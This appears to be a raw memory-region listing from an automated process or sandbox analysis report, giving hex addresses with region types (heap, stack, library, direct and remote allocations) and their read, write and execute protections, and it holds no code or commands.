2985000
heap
page read and write
73AB000
stack
page read and write
7CAE000
heap
page read and write
7911000
heap
page read and write
5010000
trusted library allocation
page read and write
6B80000
heap
page read and write
680A000
stack
page read and write
873E000
trusted library allocation
page read and write
85B0000
heap
page read and write
42DD000
stack
page read and write
AA0000
trusted library allocation
page read and write
8D8E000
stack
page read and write
57BE000
trusted library allocation
page read and write
5062000
trusted library allocation
page read and write
45A6000
trusted library allocation
page read and write
E48000
heap
page read and write
775E000
stack
page read and write
77C0000
heap
page read and write
8B6E000
stack
page read and write
5B9E000
direct allocation
page read and write
276E000
stack
page read and write
299E000
heap
page read and write
7E50000
trusted library allocation
page read and write
68C62000
unkown
page readonly
299D000
heap
page read and write
7A81000
heap
page read and write
147F000
stack
page read and write
7ED0000
trusted library allocation
page read and write
4D14000
trusted library allocation
page read and write
2D65000
heap
page read and write
297B000
heap
page read and write
68FB000
stack
page read and write
788E000
heap
page read and write
80B7000
heap
page read and write
8020000
trusted library allocation
page execute and read and write
33EE000
unkown
page read and write
CCE000
stack
page read and write
7063000
heap
page read and write
2A2B000
trusted library allocation
page read and write
3440000
heap
page read and write
5493000
trusted library allocation
page read and write
70DA000
heap
page read and write
835D000
stack
page read and write
7CB4000
heap
page read and write
4D28000
trusted library allocation
page read and write
7AE0000
trusted library allocation
page read and write
8AA4000
heap
page read and write
540D000
trusted library allocation
page read and write
80BB000
direct allocation
page read and write
86B0000
heap
page read and write
C58000
heap
page read and write
6DBF000
stack
page read and write
6B8A000
stack
page read and write
820000
trusted library allocation
page read and write
821E000
stack
page read and write
288F000
stack
page read and write
4EFC000
unkown
page readonly
6D20000
trusted library section
page read and write
6569000
trusted library allocation
page read and write
7B50000
trusted library allocation
page read and write
D8E000
stack
page read and write
538E000
stack
page read and write
4CF9000
trusted library allocation
page read and write
7D6D000
stack
page read and write
7A10000
trusted library allocation
page read and write
5712000
trusted library allocation
page read and write
4D14000
trusted library allocation
page read and write
48AF000
stack
page read and write
AE0000
heap
page read and write
6031000
trusted library allocation
page read and write
6C7D000
stack
page read and write
80DD000
heap
page read and write
7000000
trusted library allocation
page read and write
7AE0000
heap
page read and write
54D5000
trusted library allocation
page read and write
86DB000
trusted library allocation
page read and write
8BCD000
stack
page read and write
2FF7000
stack
page read and write
6E70000
heap
page read and write
73F2000
trusted library allocation
page read and write
34F9000
heap
page read and write
87D0000
trusted library allocation
page read and write
3470000
trusted library allocation
page read and write
865E000
stack
page read and write
570000
heap
page read and write
791E000
heap
page read and write
3323000
trusted library allocation
page execute and read and write
8C8000
heap
page read and write
7520000
heap
page read and write
9F0000
heap
page read and write
10A8000
heap
page read and write
2C10000
heap
page read and write
729000
trusted library allocation
page read and write
6CED000
stack
page read and write
7E0E000
stack
page read and write
711D000
heap
page read and write
4A55000
trusted library allocation
page read and write
6EF5000
heap
page read and write
7D80000
trusted library allocation
page read and write
89A0000
heap
page read and write
7BCE000
stack
page read and write
797000
stack
page read and write
4D2A000
trusted library allocation
page read and write
4D4A000
trusted library allocation
page read and write
334C000
heap
page read and write
7120000
trusted library allocation
page execute and read and write
550D000
trusted library allocation
page read and write
73C0000
trusted library allocation
page read and write
7B91000
heap
page read and write
4DE0000
heap
page read and write
569D000
heap
page read and write
7000000
heap
page execute and read and write
2C06000
heap
page read and write
6E7E000
stack
page read and write
7F00000
trusted library allocation
page read and write
7EF18000
trusted library allocation
page execute and read and write
4825000
heap
page execute and read and write
568C000
heap
page read and write
ADE000
stack
page read and write
532A000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8640000
heap
page read and write
3336000
heap
page read and write
4175000
trusted library allocation
page read and write
298D000
heap
page read and write
6FB0000
trusted library allocation
page read and write
50E0000
heap
page read and write
4D14000
trusted library allocation
page read and write
4D95000
trusted library allocation
page read and write
5E7A000
trusted library allocation
page read and write
78E7000
heap
page read and write
109E000
stack
page read and write
4F4E000
stack
page read and write
34A0000
heap
page read and write
89B0000
trusted library allocation
page read and write
5370000
heap
page read and write
5164000
trusted library allocation
page read and write
299E000
heap
page read and write
70D7000
heap
page read and write
E5F000
stack
page read and write
6BEB000
stack
page read and write
7C80000
heap
page read and write
4CE6000
trusted library allocation
page read and write
CEC000
heap
page read and write
4CE5000
trusted library allocation
page read and write
7BA0000
trusted library allocation
page read and write
3570000
heap
page read and write
4BF0000
trusted library allocation
page read and write
351D000
stack
page read and write
AD0000
trusted library allocation
page read and write
35BE000
stack
page read and write
7879000
heap
page read and write
E1A000
heap
page read and write
3610000
heap
page read and write
47FC000
unkown
page readonly
5167000
trusted library allocation
page read and write
298B000
heap
page read and write
DDD000
stack
page read and write
7C9B000
trusted library allocation
page read and write
86EE000
stack
page read and write
3300000
trusted library allocation
page read and write
7D50000
trusted library allocation
page read and write
53B6000
trusted library allocation
page read and write
4CFE000
trusted library allocation
page read and write
54C000
stack
page read and write
299D000
heap
page read and write
349C000
stack
page read and write
33F0000
heap
page read and write
806C000
heap
page read and write
8D2D000
stack
page read and write
7C6E000
stack
page read and write
8068000
heap
page read and write
33E0000
trusted library allocation
page execute and read and write
AA3000
trusted library allocation
page execute and read and write
3650000
trusted library allocation
page read and write
5525000
trusted library allocation
page read and write
720000
trusted library allocation
page read and write
4D5D000
trusted library allocation
page read and write
88B0000
heap
page read and write
8030000
trusted library allocation
page read and write
7AED000
stack
page read and write
4D29000
trusted library allocation
page read and write
709E000
stack
page read and write
7CFD000
stack
page read and write
460000
heap
page read and write
4800000
heap
page execute and read and write
514B000
heap
page read and write
4D2E000
trusted library allocation
page read and write
4498000
trusted library allocation
page read and write
7B3E000
stack
page read and write
8ABE000
stack
page read and write
4CE6000
trusted library allocation
page read and write
D0F000
stack
page read and write
8C10000
trusted library allocation
page read and write
5000000
heap
page execute and read and write
88AF000
stack
page read and write
4D27000
trusted library allocation
page read and write
7EC0000
trusted library allocation
page read and write
7BDD000
heap
page read and write
349A000
trusted library allocation
page execute and read and write
8730000
trusted library allocation
page read and write
6A8B000
stack
page read and write
5EB1000
trusted library allocation
page read and write
2B80000
heap
page read and write
6381000
trusted library allocation
page read and write
E90000
heap
page read and write
53E000
stack
page read and write
7680000
heap
page read and write
75AE000
stack
page read and write
7A39000
heap
page read and write
7C12000
heap
page read and write
865E000
stack
page read and write
4FBE000
stack
page read and write
36F0000
heap
page read and write
4E93000
trusted library allocation
page execute and read and write
7BF9000
heap
page read and write
65C8000
trusted library allocation
page read and write
4D37000
trusted library allocation
page read and write
514E000
heap
page read and write
56B5000
trusted library allocation
page read and write
3350000
heap
page read and write
7A9E000
stack
page read and write
5D2000
unkown
page execute and read and write
5078000
trusted library allocation
page read and write
11A0000
heap
page read and write
5371000
trusted library allocation
page read and write
81DE000
stack
page read and write
73A0000
trusted library allocation
page read and write
6191000
trusted library allocation
page read and write
8A8E000
stack
page read and write
7E60000
trusted library allocation
page read and write
2960000
heap
page read and write
56FC000
trusted library allocation
page read and write
4D3F000
trusted library allocation
page read and write
7EC0000
heap
page read and write
3569000
trusted library allocation
page read and write
89EE000
stack
page read and write
4CE6000
trusted library allocation
page read and write
356E000
stack
page read and write
AE0000
heap
page read and write
4CE5000
trusted library allocation
page read and write
58FB000
trusted library allocation
page read and write
7C79000
heap
page read and write
7E10000
trusted library allocation
page read and write
718000
heap
page read and write
35A2000
heap
page read and write
B74000
trusted library allocation
page read and write
8360000
trusted library allocation
page read and write
7BE0000
trusted library allocation
page read and write
4D1C000
trusted library allocation
page read and write
7B8D000
stack
page read and write
5381000
trusted library allocation
page read and write
4F70000
heap
page execute and read and write
4D43000
trusted library allocation
page read and write
886E000
stack
page read and write
522F000
stack
page read and write
82DE000
stack
page read and write
C7C000
heap
page read and write
7BF0000
heap
page read and write
25A1000
remote allocation
page execute read
3640000
trusted library allocation
page read and write
7C30000
trusted library allocation
page read and write
7ADE000
stack
page read and write
8E52000
trusted library allocation
page read and write
8D0000
heap
page read and write
58D2000
trusted library allocation
page read and write
7A20000
trusted library allocation
page read and write
5695000
heap
page read and write
6DAF000
direct allocation
page read and write
47F2000
unkown
page execute read
439E000
stack
page read and write
2971000
trusted library allocation
page read and write
5185000
trusted library allocation
page read and write
4D10000
trusted library allocation
page read and write
545E000
stack
page read and write
8002000
trusted library allocation
page read and write
73B0000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
3362000
trusted library allocation
page read and write
825000
trusted library allocation
page execute and read and write
3319000
trusted library allocation
page read and write
70AD000
stack
page read and write
53C000
stack
page read and write
89AD000
stack
page read and write
8B6C000
heap
page read and write
10A0000
heap
page read and write
60A000
heap
page read and write
6BBF000
stack
page read and write
4BA9000
trusted library allocation
page read and write
7F90000
trusted library allocation
page read and write
78E3000
heap
page read and write
C27000
heap
page read and write
BA2000
trusted library allocation
page read and write
35A7000
heap
page read and write
74A5000
heap
page execute and read and write
6CA0000
trusted library allocation
page read and write
4CF6000
trusted library allocation
page read and write
47ED000
stack
page read and write
54A0000
heap
page execute and read and write
56E9000
trusted library allocation
page read and write
E8E000
stack
page read and write
7A0E000
stack
page read and write
4C9A000
trusted library allocation
page read and write
9040000
trusted library allocation
page read and write
4F70000
heap
page read and write
8ACE000
stack
page read and write
9D7000
heap
page read and write
53A3000
trusted library allocation
page read and write
4D08000
trusted library allocation
page read and write
7C6C000
heap
page read and write
E1F000
heap
page read and write
351E000
heap
page read and write
870E000
stack
page read and write
32E0000
heap
page read and write
2990000
heap
page read and write
8D0000
heap
page read and write
10D0000
heap
page read and write
6F80000
trusted library allocation
page read and write
4CED000
trusted library allocation
page read and write
B40000
trusted library allocation
page read and write
551D000
trusted library allocation
page read and write
2A42000
trusted library allocation
page read and write
5580000
heap
page read and write
C1E000
stack
page read and write
7EA0000
trusted library allocation
page read and write
7B60000
trusted library allocation
page read and write
88F0000
trusted library allocation
page execute and read and write
76FE000
stack
page read and write
7F510000
trusted library allocation
page execute and read and write
809F000
heap
page read and write
7DA0000
trusted library allocation
page read and write
2BE0000
heap
page read and write
751B000
stack
page read and write
726B000
stack
page read and write
34E0000
heap
page execute and read and write
805E000
stack
page read and write
894E000
stack
page read and write
D9F000
stack
page read and write
4D2E000
trusted library allocation
page read and write
BA0000
heap
page read and write
4CE3000
trusted library allocation
page read and write
32BF000
stack
page read and write
7C10000
trusted library allocation
page read and write
4D48000
trusted library allocation
page read and write
798E000
stack
page read and write
D78000
heap
page read and write
5254000
trusted library allocation
page read and write
7670000
heap
page read and write
6AB000
heap
page read and write
7380000
direct allocation
page read and write
736A000
stack
page read and write
7055000
heap
page execute and read and write
6F3F000
stack
page read and write
8BAE000
stack
page read and write
4C4C000
stack
page read and write
5149000
heap
page read and write
8E95000
trusted library allocation
page read and write
356F000
heap
page read and write
45C0000
trusted library allocation
page read and write
4D36000
trusted library allocation
page read and write
7DF0000
trusted library allocation
page read and write
887E000
stack
page read and write
3554000
heap
page read and write
5123000
heap
page read and write
4CF8000
trusted library allocation
page read and write
80E6000
heap
page read and write
2D70000
heap
page read and write
6C10000
heap
page read and write
299D000
heap
page read and write
B18000
heap
page read and write
3551000
heap
page read and write
323F000
stack
page read and write
7AFD000
stack
page read and write
7EC0000
trusted library allocation
page read and write
890B000
trusted library allocation
page read and write
7BFB000
trusted library allocation
page read and write
71C0000
trusted library allocation
page read and write
7EF0000
trusted library allocation
page read and write
87C9000
trusted library allocation
page read and write
5611000
trusted library allocation
page read and write
7C50000
trusted library allocation
page read and write
5550000
heap
page read and write
72CE000
stack
page read and write
762D000
stack
page read and write
4D45000
trusted library allocation
page read and write
514F000
heap
page read and write
6FF0000
trusted library allocation
page read and write
4FFC000
stack
page read and write
7C70000
trusted library allocation
page read and write
57A7000
trusted library allocation
page read and write
90BD000
stack
page read and write
5070000
trusted library allocation
page read and write
E6E000
stack
page read and write
4CEE000
trusted library allocation
page read and write
7C30000
trusted library allocation
page read and write
65E000
heap
page read and write
4CF9000
trusted library allocation
page read and write
3340000
trusted library allocation
page read and write
7F00000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
D1E000
stack
page read and write
7390000
trusted library allocation
page read and write
978F000
stack
page read and write
299E000
heap
page read and write
3328000
heap
page read and write
299E000
heap
page read and write
7E30000
trusted library allocation
page execute and read and write
5D4000
trusted library allocation
page read and write
88C000
stack
page read and write
4CE9000
trusted library allocation
page read and write
73DE000
stack
page read and write
400000
unkown
page readonly
8C8E000
stack
page read and write
9030000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
29A5000
heap
page read and write
54C5000
trusted library allocation
page read and write
8B4E000
stack
page read and write
4D15000
trusted library allocation
page read and write
33D0000
heap
page readonly
2E36000
heap
page read and write
86DE000
trusted library allocation
page read and write
4DE1000
heap
page read and write
6EC0000
heap
page read and write
5017000
heap
page read and write
7B80000
heap
page read and write
6FD0000
trusted library allocation
page read and write
4F2E000
stack
page read and write
7ABE000
stack
page read and write
837A000
trusted library allocation
page read and write
32C0000
heap
page read and write
7A72000
heap
page read and write
7A5D000
stack
page read and write
811E000
stack
page read and write
7A67000
heap
page read and write
8720000
heap
page read and write
73EE000
stack
page read and write
2B3F000
stack
page read and write
70CE000
heap
page read and write
88E0000
trusted library allocation
page execute and read and write
9028000
trusted library allocation
page read and write
DE0000
heap
page read and write
4D02000
trusted library allocation
page read and write
43D000
stack
page read and write
BF8000
trusted library allocation
page read and write
7ACB000
heap
page read and write
7D30000
trusted library allocation
page read and write
4CED000
trusted library allocation
page read and write
7CFE000
stack
page read and write
7A2E000
stack
page read and write
5EB9000
trusted library allocation
page read and write
710D000
stack
page read and write
3695000
trusted library allocation
page execute and read and write
873B000
trusted library allocation
page read and write
4D06000
trusted library allocation
page read and write
5154000
heap
page read and write
4D25000
trusted library allocation
page read and write
EE4000
trusted library allocation
page read and write
7C60000
trusted library allocation
page read and write
8AB8000
heap
page read and write
7470000
trusted library allocation
page read and write
E60000
heap
page read and write
299E000
heap
page read and write
7EE0000
trusted library allocation
page read and write
890E000
stack
page read and write
698E000
stack
page read and write
7B01000
heap
page read and write
76ED000
stack
page read and write
7C40000
trusted library allocation
page read and write
3571000
heap
page read and write
3690000
heap
page read and write
BEE000
stack
page read and write
8390000
trusted library allocation
page read and write
4CF8000
trusted library allocation
page read and write
4A0000
heap
page read and write
69BD000
stack
page read and write
78D7000
heap
page read and write
8A00000
trusted library allocation
page read and write
55A5000
heap
page read and write
3663000
trusted library allocation
page execute and read and write
280E000
stack
page read and write
C80000
heap
page read and write
45BA000
trusted library allocation
page execute and read and write
3320000
heap
page read and write
85C0000
heap
page read and write
A0D000
heap
page read and write
4CFA000
trusted library allocation
page read and write
575D000
trusted library allocation
page read and write
53D2000
trusted library allocation
page read and write
14D000
stack
page read and write
BB7000
heap
page read and write
8C4E000
stack
page read and write
330C000
heap
page read and write
4F40000
trusted library allocation
page read and write
44EC000
stack
page read and write
8C00000
trusted library allocation
page read and write
781F000
stack
page read and write
6A18000
heap
page read and write
53EA000
trusted library allocation
page read and write
8D4E000
stack
page read and write
4D46000
trusted library allocation
page read and write
7E7B000
trusted library allocation
page read and write
78D0000
heap
page read and write
281E000
stack
page read and write
3322000
heap
page read and write
E80000
heap
page execute and read and write
DEC000
stack
page read and write
8362000
trusted library allocation
page read and write
2FFE000
stack
page read and write
4D2E000
trusted library allocation
page read and write
7C56000
heap
page read and write
3560000
heap
page read and write
869F000
stack
page read and write
32B0000
trusted library allocation
page read and write
4D0A000
trusted library allocation
page read and write
74FE000
stack
page read and write
5166000
trusted library allocation
page read and write
7CBE000
stack
page read and write
6ACE000
stack
page read and write
6DD0000
trusted library allocation
page read and write
4D34000
trusted library allocation
page read and write
4E8C000
trusted library allocation
page read and write
ED0000
trusted library allocation
page read and write
8058000
heap
page read and write
6F62000
heap
page read and write
85E0000
trusted library allocation
page read and write
298D000
heap
page read and write
2CE0000
heap
page read and write
297C000
heap
page read and write
7310000
trusted library allocation
page read and write
34BE000
heap
page read and write
2CEA000
heap
page read and write
4D15000
trusted library allocation
page read and write
4CE6000
trusted library allocation
page read and write
721E000
stack
page read and write
4D3D000
trusted library allocation
page read and write
7E4D000
stack
page read and write
6F3E000
stack
page read and write
7A74000
trusted library allocation
page read and write
48EE000
stack
page read and write
3558000
heap
page read and write
4928000
trusted library allocation
page read and write
2D81000
heap
page read and write
7E70000
trusted library allocation
page read and write
5111000
heap
page read and write
505B000
trusted library allocation
page read and write
7B7E000
stack
page read and write
58E1000
trusted library allocation
page read and write
7C34000
heap
page read and write
2D6B000
heap
page read and write
2E3A000
heap
page read and write
D70000
heap
page read and write
7189000
trusted library allocation
page read and write
3382000
heap
page read and write
8B47000
heap
page read and write
4D10000
trusted library allocation
page read and write
779E000
stack
page read and write
66D000
heap
page read and write
4892000
trusted library allocation
page read and write
745E000
stack
page read and write
514B000
heap
page read and write
7A4E000
stack
page read and write
510F000
heap
page read and write
7110000
trusted library allocation
page read and write
4D08000
trusted library allocation
page read and write
4D08000
trusted library allocation
page read and write
7090000
heap
page read and write
8EC0000
trusted library allocation
page read and write
6FC0000
trusted library allocation
page read and write
4D65000
trusted library allocation
page read and write
330D000
trusted library allocation
page execute and read and write
670B000
stack
page read and write
429F000
stack
page read and write
4D54000
trusted library allocation
page read and write
7F9E000
stack
page read and write
799E000
stack
page read and write
7E9E000
stack
page read and write
61B9000
trusted library allocation
page read and write
7112000
heap
page read and write
4A5E000
stack
page read and write
3670000
trusted library allocation
page read and write
6C0C000
heap
page read and write
3472000
heap
page read and write
5368000
trusted library allocation
page read and write
80DD000
stack
page read and write
7C50000
trusted library allocation
page read and write
4CF4000
trusted library allocation
page read and write
7320000
trusted library allocation
page execute and read and write
4EC0000
trusted library allocation
page read and write
4D46000
trusted library allocation
page read and write
70B1000
heap
page read and write
4D75000
trusted library allocation
page read and write
6C2E000
stack
page read and write
89E0000
trusted library allocation
page read and write
510F000
heap
page read and write
760000
trusted library allocation
page read and write
3270000
heap
page read and write
3664000
trusted library allocation
page read and write
71ED000
stack
page read and write
2B90000
heap
page read and write
748E000
stack
page read and write
C90000
heap
page read and write
5797000
trusted library allocation
page read and write
79DE000
stack
page read and write
6ED4000
heap
page read and write
6BDF000
heap
page read and write
4CF3000
trusted library allocation
page read and write
5631000
trusted library allocation
page read and write
296D000
heap
page read and write
74B5000
heap
page read and write
5007000
trusted library allocation
page read and write
D50000
heap
page read and write
544D000
trusted library allocation
page read and write
805C000
heap
page read and write
8CA2000
trusted library allocation
page read and write
5C0000
trusted library allocation
page read and write
5669000
trusted library allocation
page read and write
4D08000
trusted library allocation
page read and write
6EE4000
heap
page read and write
4C8B000
trusted library allocation
page read and write
4E3C000
trusted library allocation
page read and write
5E7D000
trusted library allocation
page read and write
E0F000
stack
page read and write
7204000
trusted library allocation
page read and write
7CD2000
trusted library allocation
page read and write
2EEB000
stack
page read and write
6C90000
heap
page execute and read and write
297C000
heap
page read and write
6CFE000
stack
page read and write
7400000
trusted library allocation
page read and write
491D000
stack
page read and write
742E000
stack
page read and write
6DE0000
direct allocation
page read and write
7B60000
trusted library allocation
page read and write
791E000
stack
page read and write
8A7E000
stack
page read and write
2C0D000
heap
page read and write
298D000
trusted library allocation
page read and write
700A000
heap
page read and write
5E91000
trusted library allocation
page read and write
5031000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
47F0000
unkown
page readonly
7E50000
heap
page read and write
481E000
stack
page read and write
35FF000
stack
page read and write
7FDE000
stack
page read and write
74EE000
stack
page read and write
4CF0000
trusted library allocation
page read and write
9A0000
heap
page read and write
35A0000
heap
page read and write
E30000
heap
page read and write
447E000
stack
page read and write
5BE000
stack
page read and write
6EBC000
heap
page read and write
73FE000
stack
page read and write
4D1C000
trusted library allocation
page read and write
85F0000
trusted library allocation
page read and write
272E000
stack
page read and write
4F54000
trusted library allocation
page read and write
56B1000
heap
page read and write
4D1E000
trusted library allocation
page read and write
8650000
trusted library allocation
page execute and read and write
7C0D000
stack
page read and write
3497000
trusted library allocation
page execute and read and write
54A5000
heap
page execute and read and write
5859000
trusted library allocation
page read and write
7B0000
heap
page readonly
704E000
stack
page read and write
819A000
trusted library allocation
page read and write
70CE000
stack
page read and write
34E5000
heap
page execute and read and write
45C7000
trusted library allocation
page execute and read and write
7EE0000
trusted library allocation
page read and write
4D1D000
trusted library allocation
page read and write
8EC000
heap
page read and write
299E000
heap
page read and write
742000
trusted library allocation
page read and write
74EE000
stack
page read and write
B50000
trusted library allocation
page read and write
298F000
heap
page read and write
2C2D000
heap
page read and write
3450000
trusted library allocation
page read and write
502C000
stack
page read and write
4D15000
trusted library allocation
page read and write
3537000
heap
page read and write
433E000
stack
page read and write
75BB000
stack
page read and write
783A000
heap
page read and write
D67000
stack
page read and write
36E0000
heap
page read and write
6C60000
trusted library allocation
page read and write
4D20000
trusted library allocation
page read and write
7E7D000
trusted library allocation
page read and write
8E4D000
stack
page read and write
806A000
direct allocation
page read and write
6EFF000
heap
page read and write
7BEE000
heap
page read and write
524B000
trusted library allocation
page read and write
3660000
trusted library allocation
page read and write
480E000
stack
page read and write
7C02000
heap
page read and write
AE4000
trusted library allocation
page read and write
86E0000
trusted library allocation
page read and write
9D000
stack
page read and write
7A7000
heap
page read and write
4EBC000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page execute and read and write
B70000
trusted library allocation
page read and write
4F88000
trusted library allocation
page read and write
339B000
heap
page read and write
8E75000
trusted library allocation
page read and write
2C10000
heap
page read and write
5010000
heap
page read and write
6399000
trusted library allocation
page read and write
510F000
heap
page read and write
86D0000
trusted library allocation
page read and write
839A000
trusted library allocation
page read and write
34E4000
heap
page read and write
850000
trusted library allocation
page read and write
35F3000
trusted library allocation
page execute and read and write
7F57000
trusted library allocation
page read and write
B9A000
trusted library allocation
page execute and read and write
7980000
trusted library allocation
page read and write
53B8000
trusted library allocation
page read and write
509A000
trusted library allocation
page read and write
105E000
stack
page read and write
299E000
heap
page read and write
617000
heap
page read and write
B80000
trusted library allocation
page read and write
7BF0000
trusted library allocation
page read and write
5901000
trusted library allocation
page read and write
AD7000
trusted library allocation
page execute and read and write
8FA000
stack
page read and write
6216000
trusted library allocation
page read and write
7C5000
heap
page read and write
7460000
trusted library allocation
page read and write
EE0000
trusted library allocation
page read and write
58CA000
trusted library allocation
page read and write
5799000
trusted library allocation
page read and write
7C20000
trusted library allocation
page read and write
6E8E000
stack
page read and write
27BE000
stack
page read and write
514C000
heap
page read and write
87E0000
trusted library allocation
page read and write
567B000
trusted library allocation
page read and write
70C9000
heap
page read and write
4530000
trusted library allocation
page execute and read and write
81A0000
trusted library allocation
page read and write
3679000
trusted library allocation
page read and write
838A000
trusted library allocation
page read and write
B90000
heap
page readonly
7DEE000
stack
page read and write
298D000
heap
page read and write
77EB000
stack
page read and write
4A5000
heap
page read and write
68CE000
stack
page read and write
2FBC000
stack
page read and write
7BD0000
heap
page read and write
678F000
stack
page read and write
4D1C000
trusted library allocation
page read and write
7C3E000
stack
page read and write
3377000
heap
page read and write
299D000
heap
page read and write
6EFE000
stack
page read and write
2960000
heap
page read and write
368A000
trusted library allocation
page execute and read and write
73D0000
trusted library allocation
page read and write
4CFE000
trusted library allocation
page read and write
3310000
trusted library allocation
page read and write
28DC000
heap
page read and write
52DE000
stack
page read and write
7010000
trusted library allocation
page read and write
6DA0000
direct allocation
page read and write
ED4000
trusted library allocation
page read and write
56AC000
heap
page read and write
79CD000
stack
page read and write
4D39000
trusted library allocation
page read and write
299E000
heap
page read and write
4D05000
trusted library allocation
page read and write
75F1000
heap
page read and write
5EA6000
trusted library allocation
page read and write
74A1000
trusted library allocation
page read and write
D98000
trusted library allocation
page read and write
36C0000
trusted library allocation
page read and write
7B3E000
stack
page read and write
7C65000
heap
page read and write
71F000
stack
page read and write
620E000
trusted library allocation
page read and write
7B40000
trusted library allocation
page read and write
7EED000
stack
page read and write
A11000
heap
page read and write
35F4000
trusted library allocation
page read and write
2998000
heap
page read and write
6D0000
heap
page read and write
2C15000
heap
page read and write
4CE6000
trusted library allocation
page read and write
5E7D000
trusted library allocation
page read and write
8030000
direct allocation
page read and write
35EE000
heap
page read and write
8B8D000
stack
page read and write
33AE000
unkown
page read and write
4D18000
trusted library allocation
page read and write
77AD000
stack
page read and write
DD9000
stack
page read and write
298D000
heap
page read and write
32F0000
trusted library allocation
page read and write
5639000
trusted library allocation
page read and write
7F30000
heap
page read and write
87E0000
trusted library allocation
page execute and read and write
352F000
heap
page read and write
8DAE000
stack
page read and write
71CE000
stack
page read and write
33F9000
heap
page read and write
4D54000
trusted library allocation
page read and write
4986000
trusted library allocation
page read and write
812C000
heap
page read and write
8D5000
heap
page read and write
6F4B000
heap
page read and write
7CD0000
trusted library allocation
page execute and read and write
5648000
heap
page read and write
798E000
stack
page read and write
6FF4000
trusted library allocation
page read and write
7330000
trusted library allocation
page read and write
4D57000
trusted library allocation
page read and write
8599000
stack
page read and write
4BBE000
stack
page read and write
7F1D000
stack
page read and write
87A0000
heap
page read and write
7897000
heap
page read and write
6E3F000
stack
page read and write
2FFE000
stack
page read and write
6C15000
heap
page read and write
4D3A000
trusted library allocation
page read and write
4D3F000
trusted library allocation
page read and write
CD0000
heap
page execute and read and write
32D0000
heap
page read and write
694E000
stack
page read and write
2D8B000
heap
page read and write
811E000
heap
page read and write
3340000
trusted library allocation
page read and write
72AE000
stack
page read and write
7EF0000
trusted library allocation
page read and write
45DF000
stack
page read and write
8126000
heap
page read and write
8D0E000
stack
page read and write
EDD000
trusted library allocation
page execute and read and write
354C000
heap
page read and write
341C000
heap
page read and write
4FE0000
trusted library allocation
page execute and read and write
2DC0000
heap
page read and write
724E000
stack
page read and write
988000
heap
page read and write
7DFE000
trusted library allocation
page read and write
4D44000
trusted library allocation
page read and write
787D000
heap
page read and write
861E000
stack
page read and write
4CE8000
trusted library allocation
page read and write
A60000
heap
page read and write
806A000
direct allocation
page read and write
3400000
heap
page read and write
355D000
heap
page read and write
8EC0000
trusted library allocation
page read and write
3622000
trusted library allocation
page read and write
6FC0000
trusted library allocation
page read and write
7E00000
trusted library allocation
page read and write
7D0E000
stack
page read and write
8C0E000
stack
page read and write
A68000
heap
page read and write
4D5C000
trusted library allocation
page read and write
8CF0000
trusted library allocation
page read and write
697E000
stack
page read and write
3320000
trusted library allocation
page read and write
297F000
heap
page read and write
8369000
trusted library allocation
page read and write
4D5C000
trusted library allocation
page read and write
5670000
heap
page read and write
869D000
stack
page read and write
809E000
stack
page read and write
7455000
heap
page execute and read and write
2950000
trusted library section
page read and write
4600000
heap
page read and write
7EB0000
trusted library allocation
page read and write
6C6E000
stack
page read and write
7190000
trusted library allocation
page read and write
4CEE000
trusted library allocation
page read and write
3475000
heap
page read and write
7730000
heap
page read and write
5369000
trusted library allocation
page read and write
299D000
heap
page read and write
299E000
heap
page read and write
332D000
heap
page read and write
28E6000
heap
page read and write
89BB000
trusted library allocation
page read and write
9020000
trusted library allocation
page read and write
8960000
heap
page read and write
4EA7000
heap
page read and write
4D36000
trusted library allocation
page read and write
80B0000
direct allocation
page read and write
2C09000
heap
page read and write
2978000
heap
page read and write
7161000
heap
page read and write
32F7000
heap
page read and write
4C00000
heap
page read and write
E55000
heap
page read and write
8C2D000
stack
page read and write
7B4D000
stack
page read and write
869E000
stack
page read and write
9CA000
heap
page read and write
8F00000
trusted library allocation
page execute and read and write
E30000
trusted library allocation
page read and write
57B8000
trusted library allocation
page read and write
2992000
heap
page read and write
53DB000
trusted library allocation
page read and write
7080000
heap
page execute and read and write
4580000
trusted library allocation
page read and write
5101000
heap
page read and write
4BC0000
trusted library allocation
page read and write
4D15000
trusted library allocation
page read and write
75FE000
stack
page read and write
4D4E000
trusted library allocation
page read and write
4593000
trusted library allocation
page execute and read and write
ADB000
trusted library allocation
page execute and read and write
535D000
trusted library allocation
page read and write
B89000
trusted library allocation
page read and write
2810000
trusted library allocation
page execute and read and write
327E000
stack
page read and write
4D22000
trusted library allocation
page read and write
54EE000
stack
page read and write
7A10000
trusted library allocation
page execute and read and write
4B70000
heap
page execute and read and write
4D0D000
trusted library allocation
page read and write
7391000
direct allocation
page read and write
AF0000
trusted library allocation
page read and write
75EF000
stack
page read and write
829E000
stack
page read and write
2D61000
heap
page read and write
693E000
stack
page read and write
7BD0000
trusted library allocation
page read and write
913F000
stack
page read and write
2C10000
heap
page read and write
569B000
heap
page read and write
2BC000
stack
page read and write
E10000
heap
page execute and read and write
907E000
stack
page read and write
7BC0000
trusted library allocation
page read and write
4D02000
trusted library allocation
page read and write
2972000
heap
page read and write
8710000
heap
page read and write
742F000
stack
page read and write
6E60000
heap
page read and write
2820000
heap
page read and write
8EA0000
trusted library allocation
page read and write
57C7000
trusted library allocation
page read and write
4D77000
trusted library allocation
page read and write
710F000
heap
page read and write
6D1E000
stack
page read and write
828000
trusted library allocation
page read and write
4D15000
trusted library allocation
page read and write
750000
heap
page read and write
73F0000
trusted library allocation
page read and write
48F0000
heap
page execute and read and write
6990000
heap
page read and write
7BE0000
trusted library allocation
page execute and read and write
7C5A000
heap
page read and write
746B000
stack
page read and write
7105000
heap
page read and write
76AF000
stack
page read and write
4D3E000
trusted library allocation
page read and write
569D000
heap
page read and write
7F4000
trusted library allocation
page read and write
840000
trusted library allocation
page read and write
4E6E000
stack
page read and write
4F1E000
stack
page read and write
762B000
stack
page read and write
4CE1000
trusted library allocation
page read and write
7382000
direct allocation
page read and write
6512000
trusted library allocation
page read and write
5092000
direct allocation
page read and write
7A79000
heap
page read and write
4EC5000
trusted library allocation
page execute and read and write
343E000
stack
page read and write
840E000
stack
page read and write
8D6D000
stack
page read and write
7DC0000
trusted library allocation
page read and write
72EF000
stack
page read and write
554E000
stack
page read and write
C10000
heap
page read and write
D8E000
stack
page read and write
341D000
unkown
page read and write
534B000
trusted library allocation
page read and write
355B000
heap
page read and write
4D15000
trusted library allocation
